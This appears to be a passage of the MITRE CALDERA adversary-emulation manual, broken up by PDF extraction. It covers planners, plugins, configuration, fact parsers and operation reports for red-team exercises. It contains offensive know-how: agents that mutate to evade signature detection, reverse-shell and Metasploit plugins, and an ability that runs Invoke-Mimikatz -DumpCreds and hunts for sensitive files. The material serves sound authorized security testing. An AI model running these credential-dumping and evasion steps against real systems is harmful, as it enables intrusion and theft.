Planners are single module Python files. Planners utilize the core system’s planning_svc.py, which has planning logic
useful for various types of planners.
CALDERA ships with a default planner, atomic. The atomic planner operates by atomically sending a single ability
command to each agent in the operation’s group at a time, progressing through abilities as they are enumerated in the
underyling adversary profile. When a new agent is added to the operation, the atomic planner will start with the first
ability in the adversary profile.
The atomic planner can be found in the mitre/stockpile GitHub repository at app/atomic.py.
4.8. Planners 21
caldera
For any other planner behavior and functionality, a custom planner is required. CALDERA has open sourced some
custom planners, to include the batch and buckets planners. From time to time, the CALDERA team will open source
further planners as they become more widely used, publicly available, etc.
The batch planner will retrieve all ability commands available and applicable for the operation and send them to the
agents found in the operation’s group. The batch planner uses the planning service to retrieve ability commands based
on the chosen advsersary and known agents in the operation. The abilities returned to the batch planner are based on the
agent matching the operating system (execution platform) of the ability and the ability command having no unsatisfied
facts. The batch planner will then send these ability commands to the agents and wait for them to be completed. After
each batch of ability commands is completed, the batch planner will again attempt to retrieve all ability commands
available for the operation and attempt to repeat the cycle. This is required as once ability commands are executed, new
additional ability commands may also become unlocked; e.g. required facts being present now, newly spawned agents,
etc. The batch planner should be used for profiles containing repeatable abilities.
The buckets planner is an example planner to demonstrate how to build a custom planner as well as the planning service
utilities available to planners to aid in the formation decision logic.
The batch and buckets planners can be found in the mitre/stockpile github repository at app/batch.py and app/
buckets.py.
See How to Build Planners for full walkthrough of how to build a custom planner and incorporate any custom decision
logic that is desired.
When creating a new operation, selecting a profile with repeatable abilities will disable both the atomic and the buckets
planners. Due to the behavior and functionality of these planners, repeatable abilities will result in the planner looping
infinitely on the repeatable ability. It is recommended to use the batch planner with profiles containing repeatable
abilities.
4.9 Plugins
CALDERA is built using a plugin architecture on top of the core system. Plugins are separate git repositories that plug
new features into the core system. Each plugin resides in the plugins directory and is loaded into CALDERA by adding
it to the local.yml file.
Plugins can be added through the UI or in the configuration file (likely conf/local.yml). Changes to the configuration
file while the server is shut down. The plugins will be enabled when the server restarts.
Each plugin contains a single hook.py file in its root directory. This file should contain an initialize function, which
gets called automatically for each loaded plugin when CALDERA boots. The initialize function contains the plugin
logic that is getting “plugged into” the core system. This function takes a single parameter:
• services: a list of core services that live inside the core system.
A plugin can add nearly any new functionality/features to CALDERA by using the two objects above.
A list of plugins included with CALDERA can be found on the Plugin library page.
FIVE
SERVER CONFIGURATION
Caldera’s configuration file is located at conf/local.yml, written on the first run. If the server is run with the
--insecure option (not recommended), CALDERA will use the file located at conf/default.yml.
Configuration file changes must be made while the server is shut down. Any changes made to the configuration file
while the server is running will be overwritten.
The YAML configuration file contains all the configuration variables CALDERA requires to boot up and run. A
documented configuration file is below:
ability_refresh: 60 # Interval at which ability YAML files will refresh from disk
api_key_blue: BLUEADMIN123 # API key which grants access to CALDERA blue
api_key_red: ADMIN123 # API key which grants access to CALDERA red
app.contact.dns.domain: mycaldera.caldera # Domain for the DNS contact server
app.contact.dns.socket: 0.0.0.0:53 # Listen host and port for the DNS contact server
app.contact.gist: API_KEY # API key for the GIST contact
app.contact.html: /weather # Endpoint to use for the HTML contact
app.contact.http: http://0.0.0.0:8888 # Server to connect to for the HTTP contact
app.contact.tcp: 0.0.0.0:7010 # Listen host and port for the TCP contact server
app.contact.udp: 0.0.0.0:7011 # Listen host and port for the UDP contact server
app.contact.websocket: 0.0.0.0:7012 # Listen host and port for the Websocket contact␣
(continues on next page)
23
caldera
Custom configuration files can be created with a new file in the conf/ directory. The name of the config file can then
be specified with the -E flag when starting the server.
Caldera will choose the configuration file to use in the following order:
1. A config specified with the -E or --environment command-line options. For instance, if started with python
caldera.py -E foo, CALDERA will load it’s configuration from conf/foo.yml.
2. conf/local.yml: Caldera will prefer the local configuration file if no other options are specified.
3. conf/default.yml: If no config is specified with the -E option and it cannot find a conf/local.yml config-
uration file, CALDERA will use its default configuration options.
CALDERA can be configured to allow users to log in using LDAP. To do so add an ldap section to the config with the
following fields:
• dn: the base DN under which to search for the user
• server: the URL of the LDAP server, optionally including the scheme and port
• user_attr: the name of the attribute on the user object to match with the username, e.g. cn or sAMAccountName.
Default: uid
• group_attr: the name of the attribute on the user object to match with the group, e.g. MemberOf or group.
Default: objectClass
• red_group: the value of the group_attr that specifies a red team user. Default: red
For example:
ldap:
dn: cn=users,cn=accounts,dc=demo1,dc=freeipa,dc=org
server: ldap://ipa.demo1.freeipa.org
user_attr: uid
group_attr: objectClass
red_group: organizationalperson
By default, users authenticate to CALDERA by providing credentials (username and password) in the main login
page. These credentials are verified using CALDERA’s internal user mapping, or via LDAP if LDAP login is en-
abled for CALDERA. If users want to use a different login handler, such as one that handles SAML authentication
or a login handler provided by a CALDERA plugin, the auth.login.handler.module keyword in the CALDERA
configuration file must be changed from its value of default, which is used to load the default login handler. The
configuration value, if not default, must be a Python import path string corresponding to the custom login handler
relative to the main CALDERA directory (e.g. auth.login.handler.module: plugins.customplugin.app.
my_custom_handler). If the keyword is not provided, the default login handler will be used.
The Python module referenced in the configuration file must implement the following method:
def load_login_handler(services):
"""Return Python object that extends LoginHandlerInterface from app.service.
(continues on next page)
When loading custom login handlers, CALDERA expects the referenced Python module to return an object that extends
LoginHandlerInterface from app.service.interfaces.i_login_handler. This interface provides all of the
methods that CALDERA’s authentication service requires to handle logins. If an invalid login handler is referenced in
the configuration file, then the server will exit with an error.
An example login handler Python module may follow the following structure:
def load_login_handler(services):
return CustomLoginHandler(services, HANDLER_NAME)
class CustomLoginHandler(LoginHandlerInterface):
def __init__(self, services, name):
super().__init__(services, name)
SIX
PLUGIN LIBRARY
Here you’ll get a run-down of all open-source plugins, all of which can be found in the plugins/ directory as separate
GIT repositories.
To enable a plugin, add it to the default.yml file in the conf/ directory. Make sure your server is stopped when
editing the default.yml file.
Plugins can also be enabled through the GUI. Go to Advanced -> Configuration and then click on the ‘enable’ button
for the plugin you would like to enable.
6.1 Sandcat
The Sandcat plugin contains CALDERA’s default agent, which is written in GoLang for cross-platform compatibility.
The agent will periodically beacon to the C2 server to receive instructions, execute instructions on the target host, and
then send results back to the C2 server. The agent also supports payload downloads, file uploads, and a variety of
execution and C2 communication options. For more details, see the Sandcat plugin documentation
6.1.1 Deploy
To deploy Sandcat, use one of the built-in delivery commands which allows you to run the agent on any operating system.
Each of these commands downloads the compiled Sandcat executable from CALDERA and runs it immediately. Find
the commands on the Sandcat plugin tab.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands
above, the agent will re-compile itself dynamically and it will change it’s source code so it gets a different
file hash (MD5) and a random name that blends into the operating system. This will help bypass file-based
signature detections.
6.1.2 Options
When deploying a Sandcat agent, there are optional parameters you can use when you start the executable:
• Server: This is the location of CALDERA. The agent must have connectivity to this host/port.
• Group: This is the group name that you would like the agent to join when it starts. The group does not have to
exist. A default group of my_group will be used if none is passed in.
• v: Use -v to see verbose output from sandcat. Otherwise, sandcat will run silently.
27
caldera
6.1.3 Extensions
In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality.
Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension adds to the
existing gocat module code to provide functionality such as peer-to-peer proxy implementations, additional executors,
and additional C2 contact protocols.
To request particular gocat extensions, users can include the gocat-extensions HTTP header when asking the C2 to
compile an agent. The header value must be a comma-separated list of requested extensions. The server will include
the extensions in the binary if they exist and if their dependencies are met (i.e. if extension A requires a particular
Golang module that is not installed on the server, then extension A will not be included).
Below is an example powershell snippet to request the C2 server to include the proxy_http and shells extensions:
It’s possible to customize the default values of these options when pulling Sandcat from the CALDERA server.
This is useful if you want to hide the parameters from the process tree. You can do this by passing the values in as
headers instead of as parameters.
For example, the following will download a linux executable that will use http://10.0.0.2:8888 as the server
address instead of http://localhost:8888.
6.2 Mock
The Mock plugin adds a set of simulated agents to CALDERA and allows you to run complete operations without
hooking any other computers up to your server.
These agents are created inside the conf/agents.yml file. They can be edited and you can create as many as you’d
like. A sample agent looks like:
- paw: 1234
username: darthvader
host: deathstar
group: simulation
platform: windows
location: C:\Users\Public
enabled: True
privilege: User
c2: HTTP
exe_name: sandcat.exe
executors:
- pwsh
- psh
After you load the mock plugin and restart CALDERA, all simulated agents will appear as normal agents in the Chain
plugin GUI and can be used in any operation.
6.3 Manx
The terminal plugin adds reverse-shell capability to CALDERA, along with a TCP-based agent called Manx.
When this plugin is loaded, you’ll get access to a new GUI page which allows you to drop reverse-shells on target hosts
and interact manually with the hosts.
You can use the terminal emulator on the Terminal GUI page to interact with your sessions.
6.2. Mock 29
caldera
6.4 Stockpile
6.5 Response
The response plugin is an autonomous incident response plugin, which can fight back against adversaries on a com-
promised host.
Similar to the stockpile plugin, it contains adversaries, abilties, and facts intended for incident response. These com-
ponents are all loaded through the plugins/response/data/* directory.
6.6 Compass
Create visualizations to explore TTPs. Follow the steps below to create your own visualization:
1. Click ‘Generate Layer’
2. Click ‘+’ to open a new tab in the navigator
3. Select ‘Open Existing Layer’
4. Select ‘Upload from local’ and upload the generated layer file
Compass leverages ATT&CK Navigator, for more information see: https://github.com/mitre-attack/attack-navigator
6.7 Caltack
The caltack plugin adds the public MITRE ATT&CK website to CALDERA. This is useful for deployments of
CALDERA where an operator cannot access the Internet to reference the MITRE ATT&CK matrix.
After loading this plugin and restarting, the ATT&CK website is available from the CALDERA home page. Not
all parts of the ATT&CK website will be available - but we aim to keep those pertaining to tactics and techniques
accessible.
6.8 SSL
Note: OpenSSL must be installed on your system to generate a new self-signed certificate
1. In the root CALDERA directory, navigate to plugins/ssl.
2. Place a PEM file containing SSL public and private keys in conf/certificate.pem. Follow the instructions
below to generate a new self-signed certificate:
• In a terminal, paste the command openssl req -x509 -newkey rsa:4096 -out conf/
certificate.pem -keyout conf/certificate.pem -nodes and press enter.
• This will prompt you for identifying details. Enter your country code when prompted. You may leave the
rest blank by pressing enter.
3. Copy the file haproxy.conf from the templates directory to the conf directory.
4. Open the file conf/haproxy.conf in a text editor.
5. On the line bind *:8443 ssl crt plugins/ssl/conf/insecure_certificate.pem, replace
insecure_certificate.pem with certificate.pem.
6. On the line server caldera_main 127.0.0.1:8888 cookie caldera_main, replace 127.0.0.1:8888
with the host and port defined in CALDERA’s conf/local.yml file. This should not be required if CALDERA’s
configuration has not been changed.
7. Save and close the file. Congratulations! You can now use CALDERA securely by accessing the UI
https://[YOUR_IP]:8443 and redeploying agents using the HTTPS service.
6.8. SSL 31
caldera
6.9 Atomic
The Atomic plugin imports all Red Canary Atomic tests from their open-source GitHub repository.
6.10 GameBoard
The GameBoard plugin allows you to monitor both red-and-blue team operations. The game tracks points for both sides
and determines which one is “winning”. The scoring seeks to quantify the amount of true/false positives/negatives
produced by the blue team. The blue team is rewarded points when they are able to catch the red team’s actions, and
the red team is rewarded when the blue team is not able to correctly do so. Additionally, abilities are rewarded different
amounts of points depending on the tactic they fulfill.
To begin a gameboard exercise, first log in as blue user and deploy an agent. The ‘Auto-Collect’ operation will execute
automatically. Alternatively, you can begin a different operation with the blue agent if you desire. Log in as red user
and begin another operation. Open up the gameboard plugin from the GUI and select these new respective red and blue
operations to monitor points for each operation.
6.11 Human
The Human plugin allows you to build “Humans” that will perform user actions on a target system as a means to
obfuscate red actions by Caldera. Each human is built for a specific operating system and leverages the Chrome browser
along with other native OS applications to perform a variety of tasks. Additionally, these humans can have various
aspects of their behavior “tuned” to add randomization to the behaviors on the target system.
On the CALDERA server, there are additional python packages required in order to use the Human plugin. These
python packages can be installed by navigating to the plugins/human/ directory and running the command pip3
install -r requirements.txt
With the python package installed and the plugin enabled in the configuration file, the Human plugin is ready for use.
When opening the plugin within CALDERA, there are a few actions that the human can perform. Check the box for
each action you would like the human to perform. Once the actions are selected, then “Generate” the human.
The generated human will show a deployment command for how to run it on a target machine. Before deploying the
human on a target machine, there are 3 requirements:
1. Install python3 on the target machine
2. Install the python package virtualenv on the target machine
3. Install Google Chrome on the target machine
Once the requirements above are met, then copy the human deployment command from the CALDERA server and run
it on the target machine. The deployment command downloads a tar file from the CALDERA server, un-archives it,
and starts the human using python. The human runs in a python virtual environment to ensure there are no package
conflicts with pre-existing packages.
6.12 Training
This plugin allows a user to gain a “User Certificate” which proves their ability to use CALDERA. This is the first
of several certificates planned in the future. The plugin takes you through a capture-the-flag style certification course,
covering all parts CALDERA.
6.13 Access
This plugin allows you to task any agent with any ability from the database. It also allows you to conduct Initial Access
Attacks.
The Access plugin also allows for the easy creation of abilities for Metasploit exploits.
Prerequisites:
• An agent running on a host that has Metasploit installed and initialized (run it once to set up Metasploit’s database)
• The app.contact.http option in CALDERA’s configuration includes http://
• A fact source that includes a app.api_key.red fact with a value equal to the api_key_red option in
CALDERA’s configuration
Within the build-capabilities tactic there is an ability called Load Metasploit Abilities. Run this ability
with an agent and fact source as described above, which will add a new ability for each Metasploit exploit. These
abilities can then be found under the metasploit tactic. Note that this process may take 15 minutes.
If the exploit has options you want to use, you’ll need to customize the ability’s command field. Start an opera-
tion in manual mode, and modify the command field before adding the potential link to the operation. For exam-
ple, to set RHOSTS for the exploit, modify command to include set RHOSTS <MY_RHOSTS_VALUE>; between use
<EXPLOIT_NAME>; and run.
Alternatively, you can set options by adding a fact for each option with the msf. prefix. For example, to set RHOST,
add a fact called msf.RHOST. Then in the ability’s command field add set RHOSTS \#{msf.RHOSTS}; between use
<EXPLOIT_NAME>; and run.
6.14 Builder
The Builder plugin enables CALDERA to dynamically compile code segments into payloads that can be executed as
abilities by implants. Currently, only C# is supported.
See Dynamically-Compiled Payloads for examples on how to create abilities that leverage these payloads.
6.12. Training 33
caldera
6.15 Debrief
The Debrief plugin provides a method for gathering overall campaign information and analytics for a selected set of
operations. It provides a centralized view of operation metadata and graphical displays of the operations, the techniques
and tactics used, and the facts discovered by the operations.
The plugin additionally supports the export of campaign information and analytics in PDF format.
SEVEN
PARSERS
CALDERA uses parsers to extract facts from command output. A common use case is to allow operations to take
gathered information and feed it into future abilities and decisions - for example, a discovery ability that looks for
sensitive files can output file paths, which will then be parsed into file path facts, and a subsequent ability can use those
file paths to stage the sensitive files in a staging directory.
Parsers can also be used to create facts with relationships linked between them - this allows users to associate facts
together, such as username and password facts.
Under the hood, parsers are python modules that get called when the agent sends command output to the CALDERA
server and certain conditions are met:
• If the corresponding ability has a specified parser associated with the command, the parser module will be loaded
and used to parse out any facts from the output. This will occur even if the agent ran the command outside of an
operation
• If the agent ran the command as part of an operation, but the corresponding ability does not have any specified
parsers associated with the command, CALDERA will check if the operation was configured to use default
parsers. If so, any default parsers loaded within CALDERA will be used to parse out facts from the output.
Otherwise, no parsing occurs.
• If the agent ran the command outside of an operation, but the corresponding ability does not have any specified
parsers associated with the command, CALDERA will use its default parsers to parse the output.
Non-default Parser python modules are typically stored in individual plugins, such as stockpile, in the plugin’s app/
parsers/ directory. For instance, if you look in plugins/stockpile/app/parsers, you can see a variety of parsers
that are provided out-of-the-box.
Default parsers are located in the core CALDERA repo, under app/learning. Two example modules are p_ip.py
and p_path.py, which are used to parse IP addresses and file paths, respectively. Note that the default parsers have a
different location due to their association with the learning service.
To associate specific parsers to an ability command, use the parsers keyword in the yaml file within the executor
section (see the below example).
darwin:
sh:
command: |
find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -
˓→size -500k 2>/dev/null | head -5
parsers:
(continues on next page)
35
caldera
Note that the parsers value is a nested dictionary whose key is the Python module import path of the parser to ref-
erence; in this case, plugins.stockpile.app.parsers.basic for the Parser located in plugins/stockpile/
app/parsers/basic.py. The value of this inner dict is a list of fact mappings that tell the Parser what facts and
relationships to save based on the output. In this case, we only have one mapping in the list.
Each mapping consists of the following:
• Source (required): A fact to create for any matches from the parser
• Edge (optional): A relationship between the source and target. This should be a string.
• Target (optional): A fact to create which the source connects to.
In the above example, the basic parser will take each line of output from the find command, save it as a host.file.
path fact, and link it to the file.sensitive.extension fact used in the command with the has_extension edge.
For instance, if the command was run using a file.sensitive.extension value of docx and the find command
returned /path/to/mydoc.docx and /path/to/sensitive.docx, the parser would generate the following facts
and relationships:
• /path/to/mydoc.docx <- has_extension -> docx
• /path/to/sensitive.docx <- has_extension -> docx
Note that only one parser can be linked to a command at a time, though a single parser can be used to generate multiple
facts, as in our hypothetical example above. Also note that the parser only works for the associated command executor,
so you can use different parsers for different executors and even different platforms.
The example below shows a more complicated parser - the katz parser in the stockpile plugin. This example has
multiple fact mappings for a single parser, since we want to extract different types of information from the Mimikatz
output - in particular, the password and password hash information.
platforms:
windows:
psh:
command: |
Import-Module .\invoke-mimi.ps1;
Invoke-Mimikatz -DumpCreds
parsers:
plugins.stockpile.app.parsers.katz:
- source: domain.user.name
edge: has_password
target: domain.user.password
- source: domain.user.name
edge: has_hash
target: domain.user.ntlm
- source: domain.user.name
edge: has_hash
target: domain.user.sha1
payloads:
- invoke-mimi.ps1
This time, we are using plugins.stockpile.app.parsers.katz, which will take the output from the
36 Chapter 7. Parsers
caldera
Invoke-Mimikatz -DumpCreds command and apply the 3 specified mappings when parsing the output. Note that in
all 3 mappings, the source fact is the same: domain.user.name, but the relationship edges and target facts are all dif-
ferent, based on what kind of information we want to save. The resulting facts, assuming the command was successful
and provided the desired information, will include the username, password, NTLM hash, and SHA1 hash, all linked
together with the appropriate relationship edges.
38 Chapter 7. Parsers
CHAPTER
EIGHT
RELATIONSHIPS
Many CALDERA abilities require input variables called “facts” to be provided before the ability can be run. These
facts can be provided through fact sources, or they can be discovered by a previous ability.
8.1.1 Example
As an example, the following printer discovery ability will create two facts called host.print.file and host.
print.size:
- id: 6c91884e-11ec-422f-a6ed-e76774b0daac
name: View printer queue
description: View details of queued documents in printer queue
tactic: discovery
technique:
attack_id: T1120
name: Peripheral Device Discovery
platforms:
darwin:
sh:
command: lpq -a
parsers:
plugins.stockpile.app.parsers.printer_queue:
- source: host.print.file
edge: has_size
target: host.print.size
This ability will view the printer queue using the command lpq -a. The result of lpq -a will be parsed into two facts:
host.print.file (the source) and host.print.size (the target). These two facts are dependent on each other,
and it will be helpful to understand their connection in order to use them. Therefore, we use the edge variable to explain
the relationship between the source and the target. In this case, the edge is has_size, because host.print.size
is the file size of host.print.file. All together, the source, edge, and target comprise a “relationship”. To learn
more about how the parser file creates a relationship, refer to Parsers.
39
caldera
Storing the relationship between the source and the target in the edge allows CALDERA to save several instances of
each fact while maintaining the connection between facts. For example, if the printer discovery ability (shown above)
is run, and several files are discovered in the printer queue, the following facts may be created.
The table above shows how each host.print.file value is associated with exactly one host.print.size value.
This demonstrates the importance of the edge; it maintains the association between each pair of source and target
values. Without the edge, we would just have a list of values but no information about their relationships, similar to
the following:
• host.print.file: essay.docx, image-1.png, Flier.pdf
• host.print.size: 12288, 635000, 85300
Note that the edge and the target are optional. You can create a source as an independent fact without needing to
connect it to a target.
Relationships can also be created in the CALDERA Server GUI. Use the left sidebar to navigate to “fact sources.”
Then, click “relationships” followed by “new relationship.” You can fill in values for the edge, source, and target
to be used in future operations. Then click “Save” to finish!
40 Chapter 8. Relationships
CHAPTER
NINE
REQUIREMENTS
Requirements are a mechanism used by CALDERA to determine whether an ability should be run in the course of an
operation. By default, CALDERA supplies several requirements within the Stockpile plugin that can be used by an
ability to ensure the ability only runs when the facts being used by the ability command meet certain criteria.
Requirements are defined in a Python module and are then referenced inside an ability. All requirements must be
provided at least a source fact to enforce the defined requirement on. Depending on the requirement module, a
requirement module may also need an edge value and a target fact to be provided as arguments to enforce the
defined requirement.
See Relationships for more information on relationship source, edge, and target values.
9.1 Example
41
caldera
Notice in the ability command, two facts host.user.name and host.user.password will be used. The
paw_provenance requirement enforces that only host.user.name facts that were discovered by the agent run-
ning the ability can be used (i.e. fact originated from the same paw). In the scenario this ability is run against two
agents on two different hosts where multiple host.user.name and host.user.password facts were discovered, the
paw_provenance prevents facts discovered by the first agent on the first host from being used by the second agent on
the second host. This ensures facts discovered locally on one host are only used on the host where those facts would
apply, such as in the scenario the host.user.name is a local account that only exists on the host it was discovered
on. Other possible usages could apply the paw_provenance requirement to files discovered, file paths, and running
processes, all of which would be discovered information that should only be used by the host they were discovered on
and not globally by other agents running on other hosts in an operation.
Additionally, the basic requirement enforces that only host.user.name facts with an existing has_password rela-
tionship to an existing host.user.password fact may be used. Brute forcing all available combinations of host.
user.name facts and host.user.password facts could result in high numbers of failed login attempts or locking out
an account entirely. The basic requirement ensures that the user and password combination used has a high chance
of success since the combination’s relationship has already been established by a previous ability.
The combined effect these requirements have ensures that the CALDERA operation will only attempt reliable com-
binations of host.user.name and host.user.password facts specific to the agent running the ability, instead of
arbitrarily attempting all possible combinations of host.user.name and host.user.password facts available to the
agent.
42 Chapter 9. Requirements
CHAPTER
TEN
OBJECTIVES
As part of ongoing efforts to increase the capabilities of CALDERA’s Planners, the team has implemented Objectives.
Objectives are collections of fact targets, called Goals, which can be tied to Adversaries. When an Operation starts, the
Operation will store a copy of the Objective linked to the chosen Adversary, defaulting to a base Goal of “running until
no more steps can be run” if no Objective can be found. During the course of an Operation, every time the planner
moves between buckets, the current Objective status is evaluated in light of the current knowledge of the Operation,
with the Operation completing should all goals be met.
10.1 Objectives
id: 7ac9ef07-defa-4d09-87c0-2719868efbb5
name: testing
description: This is a test objective that is satisfied if it finds a user with a␣
˓→username of 'test'
goals:
- count: 1
operator: '='
target: host.user.name
value: 'test'
Objectives can be tied to Adversaries either through the Adversaries web UI, or by adding a line similar to the following
to the Adversary’s YAML file:
objective: 7ac9ef07-defa-4d09-87c0-2719868efbb5
43
caldera
10.2 Goals
Goal objects can be examined at app/objects/secondclass/c_goal.py. Goal objects are handled as extensions
of Objectives, and are not intended to be interacted with directly.
Goal objects utilize four attributes, documented below:
• target: The fact associated with this goal, i.e. host.user.name
• value: The value this fact should have, i.e. test
• count: The number of times this goal should be met in the fact database to be satisfied, defaults to infinity (2^20)
• operator: The relationship to validate between the target and value. Valid operators include:
– <: Less Than
– >: Greater Than
– <=: Less Than or Equal to
– >=: Greater Than or Equal to
– in: X in Y
– *: Wildcard - Matches on existence of target, regardless of value
– ==: Equal to
Goals can be input to CALDERA either through the Objectives web UI modal, or through Objective YAML files, where
they can be added as list entries under goals. In the example of this below, the Objective references two Goals, one that
targets the specific username of test, and the other that is satisfied by any two acquired usernames:
goals:
- count: 1
operator: '='
target: host.user.name
value: 'test'
- count: 2
operator: '*'
target: host.user.name
value: 'N/A'
ELEVEN
OPERATION RESULTS
The “Operations” tab enables users to view past operations, create new operations, and export operation reports in JSON
or csv format. When starting a new operation, the “Operations” tab UI provides information on which commands are
executed, their status as recorded by the CALDERA C2 server, and the captured stdout and stderr as applicable.
After completing an operation, you can explore the operations setup, progress, and execution graph using the “Debrief”
plugin. Debrief also provides executive-level overviews of the operations progress and the attacks success as a PDF
report.
After an operation runs, you can export the results in two different JSON formats: an operation report or operation event
logs. Both are rich sources of information on the technical specifics of which commands were executed, at what time,
and with what result. The event logs report ability-level execution records, while the operation report covers a broader
range of target, contact, and planning information. The structures of each are compared in the Operation Report and
Event Logs sections.
The operation report JSON consists of a single dictionary with the following keys and values:
• name: String representing the name of the operation
• host_group: JSON list of dictionary objects containing information about an agent in the operation.
• start: String representing the operation start time in YYYY-MM-DD HH:MM:SS format.
• steps: nested JSON dict that maps agent paw strings to an inner dict which maps the string key steps to a list
of dict objects. Each innermost dict contains information about a step that the agent took during the operation:
– link_id: String representing the UUID of the executed link.
– ability_id: String representing the UUID of the corresponding ability for the command. (e.g.
90c2efaa-8205-480d-8bb6-61d90dbaf81b)
– command: String containing the base64 encoding of the command that was run.
– delegated: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the operation
made the link available for collection
– run: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the agent submitted the
execution results for the command.
– status: Int representing the status code for the command.
– platform: String representing the operating system on which the command was run.
– executor: String representing which agent executor was used for the command (e.g. psh for PowerShell).
– pid: Int representing the process ID for running the command.
45
caldera
– description: String representing the command description, taken from the corresponding ability de-
scription.
– name: String representing the command nae, taken from the corresponding ability name.
– attack: JSON dict containing ATT&CK-related information for the command, based on the ATT&CK
information provided by the corresponding ability:
∗ tactic: ATT&CK tactic for the command ability.
∗ technique_name: Full ATT&CK technique name for the command.
∗ technique_id: ATT&CK technique ID for the command (e.g. T1005)
– output: optional field. Contains the output generated when running the command. Only appears if the
user selected the include agent output option when downloading the report.
– agent_reported_time: Timestamp string representing the time at which the execution was ran by the
agent in YYYY-MM-DD HH:MM:SS format. This field will not be present if the agent does not support
reporting the command execution time.
• finish: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the operation finished.
• planner: Name of the planner used for the operation.
• adversary: JSON dict containing information about the adversary used in the operation
– atomic_ordering: List of strings that contain the ability IDs for the adversary.
– objective: objective UUID string for the adversary.
– tags: List of adversary tags
– has_repeatable_abilities: A boolean flag indicating if any ability in the adversary is repeatable.
– name: Adversary name
– description: Adversary description
– plugin: The adversary’s source plugin (e.g. stockpile)
– adversary_id: Adversary UUID string
• jitter: String containing the min/max jitter values.
• objectives: JSON dict containing information about the operation objective.
• facts: list of dict objects, where each dict represents a fact used or collected in the operation.
– origin_type: String representation of the fact’s origin (e.g. SEEDED if seeded by the operation’s fact
source or LEARNED if the fact was learned during execution of the operation)
– created: String representing the fact creation time in YYYY-MM-DD HH:MM:SS format
– name: String representation of the fact’s name in major to minor format (e.g. file.sensitive.
extension for a sensitive file extension)
– source: A string representing the UUID of the fact source containing this fact
– score: Integer representing the fact score
– value: A string representing the fact’s value (e.g. a fact named file.sensitive.extension may have
a value yml)
– links: A list of string-valued link UUID which generated this fact
– limit_count: Integer representing the maximum number of occurrences this fact can have in the fact
source, defaults to -1
{
"adversary": {
"adversary_id": "1a98b8e6-18ce-4617-8cc5-e65a1a9d490e",
"atomic_ordering": [
"6469befa-748a-4b9c-a96d-f191fde47d89",
"90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"4e97e699-93d7-4040-b5a3-2e906a58199e",
"300157e5-f4ad-4569-b533-9d1fa0e74d74",
"ea713bc4-63f0-491c-9a6f-0b01d560b87e"
],
"description": "An adversary to steal sensitive files",
"has_repeatable_abilities": false,
"name": "Thief",
"objective": "495a9828-cab1-44dd-a0ca-66e58177d8cc",
"plugin": "stockpile",
"tags": []
},
"facts": [
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"fa7ac865-004d-4296-9d68-fd425a481b5e"
],
"name": "file.sensitive.extension",
(continues on next page)
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionsql",
"value": "sql"
},
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"ddf2aa96-24a1-4e71-8360-637a821b0781"
],
"name": "file.sensitive.extension",
"origin_type": "SEEDED",
"relationships": [
"host.file.path(/Users/foo/bar/credentials.yml) : has_extension : file.sensitive.
˓→extension(yml)"
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionyml",
"value": "yml"
},
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"719378af-2f64-4902-9b51-fb506166032f"
],
"name": "file.sensitive.extension",
"origin_type": "SEEDED",
"relationships": [
"host.file.path(/Users/foo/bar/PyTorch Models/myModel.pt) : has_extension : file.
˓→sensitive.extension(pt)"
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionpt",
"value": "pt"
},
(continues on next page)
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/PyTorch Models/myModel.pt",
"value": "/Users/foo/bar/PyTorch Models/myModel.pt"
},
{
"collected_by": [
"vrgirx"
],
"created": "2022-05-11T22:09:07Z",
"limit_count": -1,
"links": [
"ddf2aa96-24a1-4e71-8360-637a821b0781"
],
(continues on next page)
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/credentials.yml",
"value": "/Users/foo/bar/credentials.yml"
},
{
"collected_by": [
"vrgirx"
],
"created": "2022-05-11T22:10:45Z",
"limit_count": -1,
"links": [
"fa7ac865-004d-4296-9d68-fd425a481b5e"
],
"name": "host.file.path",
"origin_type": "LEARNED",
"relationships": [
"host.file.path(/Users/foo/bar/sensitive.sql) : has_extension : file.sensitive.
˓→extension(sql)"
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/sensitive.sql",
"value": "/Users/foo/bar/sensitive.sql"
}
],
"finish": "2022-05-11T22:15:04Z",
"host_group": [
{
"architecture": "amd64",
"available_contacts": [
"HTTP"
],
"contact": "HTTP",
"created": "2022-05-11T18:42:02Z",
"deadman_enabled": true,
"display_name": "TARGET-PC$foo",
"exe_name": "splunkd",
"executors": [
"proc",
"sh"
],
(continues on next page)
˓→",
"delegated": "2022-05-11T22:07:22Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
"link_id": "719378af-2f64-4902-9b51-fb506166032f",
"name": "Find files",
"output": "/Users/foo/bar/PyTorch\\ Models/myModel.pt",
"pid": 56376,
"platform": "darwin",
"run": "2022-05-11T22:08:56Z",
"status": 0
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"agent_reported_time": "2022-05-11T22:09:02Z",
"attack": {
(continues on next page)
˓→",
"delegated": "2022-05-11T22:08:57Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
